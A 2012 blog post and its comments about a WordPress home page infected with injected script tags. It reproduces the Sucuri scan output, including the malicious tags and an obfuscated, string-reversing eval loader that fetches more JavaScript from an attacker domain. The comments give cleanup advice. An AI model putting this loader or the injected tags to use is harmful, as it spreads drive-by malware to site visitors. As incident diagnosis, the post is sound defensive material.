Friday, March 30, 2012

page malware

found this on my wordpress index page

how did it embed into the home page?


Anomaly behavior detected (possible malware).
Details: http://sucuri.net/malware/malware-entry-

mwanomalysp8
< script type="text/javascript"

src="http://ninjutsu.ws/js/">
< script type="text/javascript"

src="http://abellacasa.com.br/_str/">

Javascript included from a blacklisted domain.
Details: http://sucuri.net/malware/entry/MW:BLK:2
Javascript: abellacasa.com.br


http://ninjutsu.ws/js/
function r(s) { var i = 0; var ss = ''; for (i=s.length

- 1; i >= 0; i--) { ss += s.charAt(i); } return ss; }

try { new document(1111); } catch(e) { x = eval; x(r

('"=crs "tpircsavaj/txet"=epyt

tpircs<\'(etirw.tnemucod') +

'http://ninjutsu.ws/js/1.js' + r(')\'>tpircs/<>"')); }

3 comments:

  1. I have the same problem on my Wordpress installation (same date as you).

    Have you found a the corrupted file? I have yet to find it and I've looked for almost everything.
    So far I've done site-wide searches in the files for "ninjutsu" in plain text or known encryption libraries such as base64, ro13, js unescape, etc.). Those searches yielded no results yet.

    ReplyDelete
  2. log in
    go to "Appearance" on the left nav
    then "Editor"
    then find your index.php on the list called "Templates" on the right
    then delete the < script at the top (your template should probably start <?php

    ReplyDelete
  3. thanks for your help anonymous

    ReplyDelete